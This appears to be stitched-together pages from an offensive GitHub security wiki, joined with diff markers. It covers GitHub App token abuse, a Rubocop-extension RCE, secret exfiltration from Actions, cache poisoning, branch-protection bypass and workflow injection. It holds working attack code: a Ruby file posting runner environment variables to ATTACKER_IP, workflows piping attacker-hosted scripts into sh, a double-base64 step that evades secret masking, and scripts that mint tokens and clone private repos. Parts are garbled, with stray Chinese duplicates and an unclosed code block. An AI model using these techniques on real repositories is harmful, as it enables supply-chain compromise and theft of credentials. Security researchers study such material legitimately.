- GitHub App ID (numeric). GitHub requires iss to be the App ID
Create JWT (RS256):
```python
#!/usr/bin/env python3
import time, jwt
with open("priv.pem", "r") as f:
    signing_key = f.read()

APP_ID = "123456" # GitHub App ID (numeric)

def gen_jwt():
    now = int(time.time())
    payload = {
        "iat": now - 60,
        "exp": now + 600 - 60,  # ≤10 minutes
        "iss": APP_ID,
    }
    return jwt.encode(payload, signing_key, algorithm="RS256")
```
List installations for the authenticated app:
```bash
JWT=$(python3 -c 'import time,jwt,sys;print(jwt.encode({"iat":int(time.time()-60),"exp":int(time.time())+540,"iss":sys.argv[1]}, open("priv.pem").read(), algorithm="RS256"))' 123456)
curl -sS -H "Authorization: Bearer $JWT" \
  -H "Accept: application/vnd.github+json" \
  -H "X-GitHub-Api-Version: 2022-11-28" \
  https://api.github.com/app/installations
```
Create an installation access token (valid ≤10 minutes):
```bash
INSTALL_ID=12345678
curl -sS -X POST \
  -H "Authorization: Bearer $JWT" \
  -H "Accept: application/vnd.github+json" \
  -H "X-GitHub-Api-Version: 2022-11-28" \
  https://api.github.com/app/installations/$INSTALL_ID/access_tokens
```
Use the token to access code. You can clone or push using the x-access-token URL form:
```bash
TOKEN=ghs_...
REPO=owner/name
git clone https://x-access-token:${TOKEN}@github.com/${REPO}.git
# push works if the app has contents:write on that repository
```
Programmatic PoC to target a specific org and list private repos (PyGithub + PyJWT):
```python
#!/usr/bin/env python3
import time, jwt, requests
from github import Auth, GithubIntegration
with open("priv.pem", "r") as f:
    signing_key = f.read()

APP_ID = "123456" # GitHub App ID (numeric)
ORG = "someorg"

def gen_jwt():
    now = int(time.time())
    payload = {"iat": now-60, "exp": now+540, "iss": APP_ID}
    return jwt.encode(payload, signing_key, algorithm="RS256")

auth = Auth.AppAuth(APP_ID, signing_key)
GI = GithubIntegration(auth=auth)
installation = GI.get_org_installation(ORG)  # resolve the app installation for the target org
print(f"Installation ID: {installation.id}")
jwt_tok = gen_jwt()
r = requests.post(
    f"https://api.github.com/app/installations/{installation.id}/access_tokens",
    headers={
        "Accept": "application/vnd.github+json",
        "Authorization": f"Bearer {jwt_tok}",
        "X-GitHub-Api-Version": "2022-11-28",
    },
)
access_token = r.json()["token"]
print("--- repos ---")
for repo in installation.get_repos():
    print(f"* {repo.full_name} (private={repo.private})")
    clone_url = f"https://x-access-token:{access_token}@github.com/{repo.full_name}.git"
    print(clone_url)
```
Notes:
- Installation tokens inherit exactly the app's repository-level permissions (for example, contents: write, pull_requests: write)
- Tokens expire in ≤10 minutes, but new tokens can be minted indefinitely as long as you retain the private key
- You can also enumerate installations via the REST API (GET /app/installations) using the JWT
## Compromise & Abuse Github Action
There are several techniques to compromise and abuse a Github Action, check them here:
{{#ref}}
abusing-github-actions/
{{#endref}}
## Abusing third-party GitHub Apps running external tools (Rubocop extension → RCE)
Some GitHub Apps and PR review services execute external linters/SAST against pull requests using repository-controlled configuration files. If a supported tool allows dynamic code loading, a PR can achieve RCE on the service's runner.
Example: Rubocop supports loading extensions from its YAML config. If the service passes through a repo-provided .rubocop.yml, you can execute arbitrary Ruby by requiring a local file.
- Trigger conditions usually include:
- The tool is enabled in the service
- The PR contains files the tool recognizes (for Rubocop: .rb)
- The repo contains the tools config file (Rubocop searches for .rubocop.yml anywhere)
Exploit files in the PR:
.rubocop.yml
```yaml
require:
  - ./ext.rb
```
ext.rb (exfiltrate runner env vars):
```ruby
require 'net/http'
require 'uri'
require 'json'

env_vars = ENV.to_h  # gather the runner's environment variables (reconstructed step; the original elided it)
json_data = env_vars.to_json
url = URI.parse('http://ATTACKER_IP/')
begin
  http = Net::HTTP.new(url.host, url.port)
  req = Net::HTTP::Post.new(url.path)
  req['Content-Type'] = 'application/json'
  req.body = json_data
  http.request(req)
rescue StandardError => e
  warn e.message
end
```
Also include a sufficiently large dummy Ruby file (e.g., main.rb) so the linter actually runs.
Impact observed in the wild:
- Full code execution on the production runner that executed the linter
- Exfiltration of sensitive environment variables, including the GitHub App private key used by the service, API keys, DB credentials, etc.
- With a leaked GitHub App private key you can mint installation tokens and get read/write access to all repositories granted to that app (see the section above on GitHub App impersonation)
Hardening guidelines for services running external tools:
- Treat repository-provided tool configs as untrusted code
- Execute tools in tightly isolated sandboxes with no sensitive environment variables mounted
- Apply least-privilege credentials and filesystem isolation, and restrict/deny outbound network egress for tools that don't require internet access
## Branch Protection Bypass
- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way.
- _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you can, you can abuse it to accept your PRs._
- **Dismiss approvals when new commits are pushed**: If this isn't set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch.
- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**.
- When a **CODEOWNER file is misconfigured**, Github doesn't complain but it doesn't use it. Therefore, if it's misconfigured, the **Code Owners protection isn't applied.**
- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections.
- **Include administrators**: If this isn't set and you are an admin of the repo, you can bypass these branch protections.
- **PR Hijacking**: You might be able to **modify the PR of someone else**, adding malicious code, approving the resulting PR yourself and merging everything.
- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.
- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
- If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
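The GITHUB_TOKEN approval trick above can be sketched as a workflow step like the following (hypothetical: the `PR_NUMBER` variable is assumed to be supplied elsewhere, and it only works if the repo lets the token submit approving reviews):

```yaml
# Hypothetical workflow step: self-approve the attacker's PR with the repo-scoped GITHUB_TOKEN
- name: Approve attacker PR
  env:
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
  run: gh pr review "$PR_NUMBER" --approve  # PR_NUMBER is an assumption, set earlier in the workflow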
## Bypass Environments Protections
For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).
In case an environment can be **accessed from all the branches**, it **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying their names or by using `*`); in that scenario, **find a branch where you can push code** and you can **exfiltrate** the secrets by creating a new github action (or modifying one).
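As a minimal sketch, a workflow pushed to such a branch could dump the secrets of an unprotected environment (the environment name `production` and the secret name `PROD_TOKEN` are assumptions for illustration):

```yaml
name: exfil-env-secrets
on: push
jobs:
  leak:
    runs-on: ubuntu-latest
    environment: production  # hypothetical environment accessible from all branches
    steps:
      - run: echo "${{ secrets.PROD_TOKEN }}" | base64 | base64  # double-encode to dodge secret masking in logs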
Note that you might find the edge case where **all the branches are protected** (via wildcard `*`), where it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action, because you can create a branch and use the push trigger on it. As the **branch protection allows the push to a new branch, the github action will be triggered**.
```yaml
push: # Run it when a push is made to a branch
  branches:
    - current_branch_name # Use '**' to run when a push is made to any branch
```
Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but by that time you will have already dumped the secrets.
## Persistence
- Generate **user token**
- Steal **github tokens** from **secrets**
- **Deletion** of workflow **results** and **branches**
- Give **more permissions to all the org**
- Create **webhooks** to exfiltrate information
- Invite **outside collaborators**
- **Remove** **webhooks** used by the **SIEM**
- Create/modify **Github Action** with a **backdoor**
- Find a **Github Action vulnerable to command injection** via **secret** value modification
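A backdoored workflow kept for persistence could look like this minimal sketch (the workflow name and payload URL are made up):

```yaml
name: ci-lint  # innocuous-looking name
on:
  push:
  schedule:
    - cron: '0 3 * * *'  # also fire daily so access survives quiet periods
jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - run: curl -s https://attacker.example/implant.sh | sh  # hypothetical payload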
### Imposter Commits - Backdoor via repo commits
In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the original repo is going to be created for the fork version of the code. Therefore, an attacker **could pin a specific commit from an apparently legit repo that wasn't created by the owner of the repo**.
Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
```yaml
name: example
on: [push]
jobs:
  commit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
      - shell: bash
        run: |
          echo 'hello world!'
```
For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
## References
- [How we exploited CodeRabbit: from a simple PR to RCE and write access on 1M repositories](https://research.kudelskisecurity.com/2025/08/19/how-we-exploited-coderabbit-from-a-simple-pr-to-rce-and-write-access-on-1m-repositories/)
- [Rubocop extensions (require)](https://docs.rubocop.org/rubocop/latest/extensions.html)
- [Authenticating with a GitHub App (JWT)](https://docs.github.com/en/apps/creating-github-apps/authenticating-with-a-github-app)
- [List installations for the authenticated app](https://docs.github.com/en/rest/apps/apps?apiVersion=2022-11-28#list-installations-for-the-authenticated-app)
- [Create an installation access token for an app](https://docs.github.com/en/rest/apps/apps?apiVersion=2022-11-28#create-an-installation-access-token-for-an-app)
{{#include ../../banners/hacktricks-training.md}}


@@ -1,3 +1,5 @@
# Gh Actions - Artifact Poisoning
{{#include ../../../banners/hacktricks-training.md}}


@@ -2,49 +2,4 @@
{{#include ../../../banners/hacktricks-training.md}}
## Overview
The GitHub Actions cache is repository-wide. Any workflow that knows a cache `key` (or `restore-keys`) can populate that entry, even if the job only has `permissions: contents: read`. GitHub does not isolate caches per workflow, event type or trust level, so an attacker who compromises a low-privilege job can poison a cache that is later restored by a privileged release job. This is how the Ultralytics compromise pivoted from a `pull_request_target` workflow into the PyPI release pipeline.
## Attack primitives
- `actions/cache` exposes both restore and save operations (`actions/cache@v4`, `actions/cache/save@v4`, `actions/cache/restore@v4`). Any job is allowed to call save, except genuinely untrusted `pull_request` workflows from forks.
- Cache entries are identified only by their `key`. Broad `restore-keys` make injecting a payload easy, because the attacker only needs to collide with a prefix.
- The cached filesystem is restored as-is. If the cache contains scripts or binaries that are executed later, the attacker controls that execution path.
## Example exploitation chain
_Attacker workflow (`pull_request_target`) poisoned the cache:_
```yaml
steps:
  - run: |
      mkdir -p toolchain/bin
      printf '#!/bin/sh\ncurl https://attacker/payload.sh | sh\n' > toolchain/bin/build
      chmod +x toolchain/bin/build
  - uses: actions/cache/save@v4
    with:
      path: toolchain
      key: linux-build-${{ hashFiles('toolchain.lock') }}
```
_Privileged workflow restored and executed the poisoned cache:_
```yaml
steps:
  - uses: actions/cache/restore@v4
    with:
      path: toolchain
      key: linux-build-${{ hashFiles('toolchain.lock') }}
  - run: toolchain/bin/build release.tar.gz
```
The second job now runs attacker-controlled code while holding the release credentials (PyPI tokens, PATs, cloud deploy keys, etc.).
## Practical exploitation tips
- Target workflows triggered by `pull_request_target`, `issue_comment` or bot commands that still save caches: GitHub lets them overwrite the repository-wide keys even if the runner only has read access to the repo.
- Look for deterministic cache keys reused across trust boundaries (e.g. `pip-${{ hashFiles('poetry.lock') }}`) or permissive `restore-keys`, then save your malicious tarball before the privileged workflow runs.
- Monitor the logs for `Cache saved` entries, or add your own cache-save step, so the next release job restores that payload and executes the trojanized script or binary.
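For example, a `restore-keys` prefix this broad means any attacker-saved entry starting with `pip-` can be served to the privileged job (the path and key names below are illustrative assumptions):

```yaml
# Broad prefix: any cache entry named pip-<anything> can satisfy this restore
- uses: actions/cache@v4
  with:
    path: ~/.cache/pip
    key: pip-${{ hashFiles('requirements.txt') }}
    restore-keys: pip-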
## References
- [A Survey of 2024-2025 Open-Source Supply-Chain Compromises and Their Root Causes](https://words.filippo.io/compromise-survey/)
{{#include ../../../banners/hacktricks-training.md}}


@@ -2,73 +2,81 @@
{{#include ../../../banners/hacktricks-training.md}}
## Understanding the risk
GitHub Actions renders expressions ${{ ... }} before the step executes. The rendered value is pasted into the step's program (for run steps, a shell script). If you interpolate untrusted input directly inside run:, the attacker controls part of the shell program and can execute arbitrary commands.
Docs: https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions and contexts/functions: https://docs.github.com/en/actions/learn-github-actions/contexts
Key points:
- Rendering happens before execution. The run script is generated with all expressions resolved, then executed by the shell.
- Many contexts contain user-controlled fields depending on the triggering event (issues, PRs, comments, discussions, forks, stars, etc.). See the untrusted input reference: https://securitylab.github.com/resources/github-actions-untrusted-input/
- Shell quoting inside run: is not a reliable defense, because the injection occurs at the template rendering stage. Attackers can break out of quotes or inject operators via crafted input.
## Vulnerable pattern → RCE on runner
Vulnerable workflow (triggered when someone opens a new issue):
```yaml
name: New Issue Created
on:
  issues:
    types: [opened]

jobs:
  deploy:
    runs-on: ubuntu-latest
    permissions:
      issues: write
    steps:
      - name: New issue
        run: |
          echo "New issue ${{ github.event.issue.title }} created"
      - name: Add "new" label to issue
        uses: actions-ecosystem/action-add-labels@v1
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          labels: new
```
If an attacker opens an issue titled $(id), the rendered step becomes:
```sh
echo "New issue $(id) created"
```
The command substitution runs id on the runner. Example output:
```
New issue uid=1001(runner) gid=118(docker) groups=118(docker),4(adm),100(users),999(systemd-journal) created
```
Why quoting doesn't save you:
- Expressions are rendered first, then the resulting script runs. If the untrusted value contains $(...), `;`, `"`/`'`, or newlines, it can alter the program structure despite your quoting.
## Safe pattern (shell variables via env)
Correct mitigation: copy untrusted input into an environment variable, then use native shell expansion ($VAR) in the run script. Do not re-embed with ${{ ... }} inside the command.
```yaml
# safe
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: New issue
        env:
          TITLE: ${{ github.event.issue.title }}
        run: |
          echo "New issue $TITLE created"
```
Notes:
- Avoid using ${{ env.TITLE }} inside run:. That reintroduces template rendering back into the command and brings the same injection risk.
- Prefer passing untrusted inputs via env: mapping and reference them with $VAR in run:.
## Reader-triggerable surfaces (treat as untrusted)
Accounts with only read permission on public repositories can still trigger many events. Any field in contexts derived from these events must be considered attacker-controlled unless proven otherwise. Examples:
- issues, issue_comment
- discussion, discussion_comment (orgs can restrict discussions)
- pull_request, pull_request_review, pull_request_review_comment
@@ -77,14 +85,14 @@ echo "New issue $TITLE created"
- watch (starring a repo)
- Indirectly via workflow_run/workflow_call chains
Which specific fields are attacker-controlled is event-specific. Consult GitHub Security Lab's untrusted input guide: https://securitylab.github.com/resources/github-actions-untrusted-input/
## Practical tips
- Minimize use of expressions inside run:. Prefer env: mapping + $VAR.
- If you must transform input, do it in the shell using safe tools (printf %q, jq -r, etc.), still starting from a shell variable.
- Be extra careful when interpolating branch names, PR titles, usernames, labels, discussion titles, and PR head refs into scripts, command-line flags, or file paths.
- For reusable workflows and composite actions, apply the same pattern: map to env then reference $VAR.
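A small bash sketch of the `printf %q` tip: the untrusted value is first captured in a shell variable, then escaped before any re-use. The title value is a made-up attacker-style example.

```shell
#!/bin/bash
TITLE='$(id); echo pwned'        # simulated attacker-controlled issue title
SAFE=$(printf '%q' "$TITLE")     # bash-escapes every shell metacharacter
echo "Escaped title: $SAFE"      # the $(id) is printed literally, never executed
```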
## References
@@ -93,4 +101,4 @@ echo "New issue $TITLE created"
- [Contexts and expression syntax](https://docs.github.com/en/actions/learn-github-actions/contexts)
- [Untrusted input reference for GitHub Actions](https://securitylab.github.com/resources/github-actions-untrusted-input/)
{{#include ../../../banners/hacktricks-training.md}}


@@ -1,56 +1,58 @@
# Accessible Deleted Data in Github
{{#include ../../banners/hacktricks-training.md}}
These ways to access supposedly deleted Github data were [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
## Accessing Deleted Fork Data
1. You fork a public repository
2. You commit code to your fork
3. You delete your fork
> [!CAUTION]
> The data committed in the deleted fork is still accessible.
## Accessing Deleted Repo Data
1. You have a public repo on GitHub.
2. A user forks your repo.
3. You commit data after they fork it (and they never sync their fork with your updates).
4. You delete the entire repo.
> [!CAUTION]
> Even if you deleted your repo, all the changes made to it are still accessible through the forks.
## Accessing Private Repo Data
1. You create a private repo that will eventually be made public.
2. You create a private, internal version of that repo (via forking) and commit additional code for features that youre not going to make public.
3. You make your “upstream” repository public and keep your fork private.
> [!CAUTION]
> It's possible to access all the data pushed to the internal fork in the time between when the internal fork was created and when the public version was made public.
## How to discover commits from deleted/hidden forks
The same blog post proposes 2 options:
### Directly accessing the commit
If the commit ID (sha-1) value is known, it's possible to access it at `https://github.com/<user/org>/<repo>/commit/<commit_hash>`.
### Brute-forcing short SHA-1 values
Both of these URLs access the same commit:
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
And the latter uses a short SHA-1 that is brute-forceable.
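A sketch of that enumeration, assuming a hypothetical `ORG/REPO` and 4-hex-character short SHAs (65,536 candidates); in practice you would request each URL and keep the ones that return 200:

```shell
#!/bin/bash
# Enumerate every 4-hex-char short SHA candidate for a hypothetical repo
for i in $(seq 0 65535); do
  printf 'https://github.com/ORG/REPO/commit/%04x\n' "$i"
done > candidates.txt
head -n 2 candidates.txt
wc -l < candidates.txt
# Then probe each URL (e.g. curl -o /dev/null -w '%{http_code}') and keep the hits
```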
## References
- [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
{{#include ../../banners/hacktricks-training.md}}


@@ -1,188 +1,194 @@
# Basic Github Information
{{#include ../../banners/hacktricks-training.md}}
## Basic Structure
The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations**, each of which may contain **several repositories** and **several teams**. Smaller companies may just **own one organization and no enterprises**.
From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**.
Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles.
And finally **repositories may have special protection mechanisms**.
## Privileges
### Enterprise Roles
- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository.
- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
### Organization Roles
In an organisation users can have different roles:
- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
- If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
### Members Privileges
_https://github.com/organizations/\<org_name>/settings/member_privileges_ 你可以查看 **仅因成为该组织的一员而赋予用户的权限**
In _https://github.com/organizations/\<org_name>/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**.
The settings here configured will indicate the following permissions of members of the organisation:
- Have admin, write, read or no permission over all the organisation repos.
- If members can create private, internal or public repositories.
- If forking of repositories is possible.
- If it's possible to invite outside collaborators.
- If public or private sites can be published.
- The permissions admins have over the repositories.
- If members can create new teams.
### Repository Roles
By default these repository roles are created:
- **Read**: Recommended for **non-code contributors** who want to view or discuss your project
- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access
- **Write**: Recommended for contributors who **actively push to your project**
- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions
- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository
You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
You can also **create your own roles** in _https://github.com/organizations/\<org_name>/settings/roles_
### Teams
You can **list the teams created in an organization** in _https://github.com/orgs/\<org_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
### Users
The users of an organization can be **listed** in _https://github.com/orgs/\<org_name>/people._
In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
## Github Authentication
Github offers different ways to authenticate to your account and perform actions on your behalf.
### Web Access
Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**).
### **SSH Keys**
You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
#### **GPG Keys**
You **cannot impersonate the user with these keys**, but if you don't use them you might **get discovered for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
### **Personal Access Tokens**
You can generate a personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** the **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
### Oauth Applications
Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers)
- You can see all the **Oauth applications that have access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications)
- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
- You can see third party access of applications in an **organization** in _https://github.com/organizations/\<org_name>/settings/oauth_application_policy_
Some **security recommendations**:
- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes.
- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user.
- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can act on **all of the authenticated user's repositories**.
- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
### Github Applications
Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository.
- The GitHub App should **connect to a personal account or an organisation**.
- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps)
- You can see all the **Github applications that have access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
- These are the **API Endpoints for Github Applications**: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App, it will be able to access some of them.
- You can see installed apps in an **organization** in _https://github.com/organizations/\<org_name>/settings/installations_
Some security recommendations:
- A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
- Make sure the GitHub App integrates with **specific repositories**.
- The GitHub App should **connect to a personal account or an organisation**.
- Don't expect the GitHub App to know and do everything a user can.
- **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things.
- Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
- If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
### Github Actions
This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github**, and **depending** on the **privileges** given to the Action, several **different attacks** could be performed. See below for more information.
## Git Actions
Git actions allow automating the **execution of code when an event happens**. Usually the code executed is **somehow related to the code of the repository** (e.g., building a docker container or checking that a PR doesn't contain secrets).
### Configuration
_https://github.com/organizations/\<org_name>/settings/actions_ 可以查看组织的 **github actions 的配置**
In _https://github.com/organizations/\<org_name>/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions.
It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB_TOKEN** of a Github Action when it's run.
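As a sketch of what locking down the token looks like (the workflow, job, and step names here are illustrative, not from the source), the `GITHUB_TOKEN` can be scoped per workflow or per job:

```yaml
# Hypothetical workflow fragment: drop all default GITHUB_TOKEN permissions
# at the workflow level, then grant each job only what it needs.
name: build
on: [push]
permissions: {}          # deny-by-default for every job in this workflow
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read     # the only scope this job actually needs
    steps:
      - uses: actions/checkout@v4
      - run: make build  # assumed build command
```

With `permissions: {}` at the top, every job must opt in to exactly the scopes it uses, so a compromised Action in one job cannot, for example, push code or create releases with the token.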
### Git Secrets
Github Actions usually need some kind of secrets to interact with github or third-party applications. To **avoid putting them in clear-text** in the repo, github allows you to store them as **Secrets**.
These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like:
```yaml
steps:
  - name: Hello world action
    with: # Set the secret as an input
      super_secret: ${{ secrets.SuperSecret }}
    env: # Or as an environment variable
      super_secret: ${{ secrets.SuperSecret }}
```
#### Example using Bash <a href="#example-using-bash" id="example-using-bash"></a>
```yaml
steps:
  - shell: bash
    env:
      SUPER_SECRET: ${{ secrets.SuperSecret }}
    run: |
      example-command "$SUPER_SECRET"
```
> [!WARNING]
> Secrets **can only be accessed from the Github Actions** that have them declared.
> Once configured in the repo or the organization, **users of github won't be able to access them again**; they will only be able to **change them**.
Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
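A minimal sketch of why runner access defeats the log protection: Actions redacts the exact secret string from logs, so any reversible transformation applied on a compromised runner slips past the filter (the secret value here is made up):

```python
import base64

# Stand-in value for a secret exposed to a compromised workflow step.
secret = "s3cr3t-value"

# GitHub's log filter redacts exact occurrences of the secret string,
# but an encoded copy is a different string and is printed verbatim.
encoded = base64.b64encode(secret.encode()).decode()
print(encoded)  # → czNjcjN0LXZhbHVl
assert base64.b64decode(encoded).decode() == secret  # trivially reversible
```

Defenders should therefore treat any code executed by a workflow with access to a secret as able to read that secret, regardless of log masking.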
### Git Environments
Github allows you to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
```yaml
jobs:
  deployment:
    runs-on: ubuntu-latest
    environment: env_name
```
You can configure an environment to be **accessed** by **all branches** (default), **only protected branches**, or only the **branches you specify**.\
Additionally, environment protections include:
- **Required reviewers**: gate jobs targeting the environment until approved. Enable **Prevent self-review** to enforce a proper four-eyes principle on the approval itself.
@@ -227,12 +233,12 @@ The **branch protections of a repository** can be found in _https://github.com/\
Different protections can be applied to a branch (like to master):
- You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is selected, several other protections can be in place:
- **Require a number of approvals**. It's very common to require 1 or 2 other people to approve your PR so a single user isn't capable of merging code directly.
- **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
- **Require approval of the most recent reviewable push**. Ensures that any new commits after an approval (including pushes by other collaborators) re-trigger review so an attacker cannot push post-approval changes and merge.
- **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
- **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
- **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
- **Require status checks to pass before merging.** Some checks need to pass before being able to merge the commit (like a GitHub App reporting SAST results). Tip: bind required checks to a specific GitHub App; otherwise any app could spoof the check via the Checks API, and many bots accept skip directives (e.g., "@bot-name skip").
- **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.
- **Require signed commits**. The commits need to be signed.
@@ -267,3 +273,5 @@ This chain prevents a single collaborator from retagging or force-publishing rel
- [GitHub Actions: A Cloudy Day for Security - Part 1](https://binarysecurity.no/posts/2025/08/securing-gh-actions-part1)
{{#include ../../banners/hacktricks-training.md}}


@@ -1,79 +1,85 @@
# Jenkins Security
{{#include ../../banners/hacktricks-training.md}}
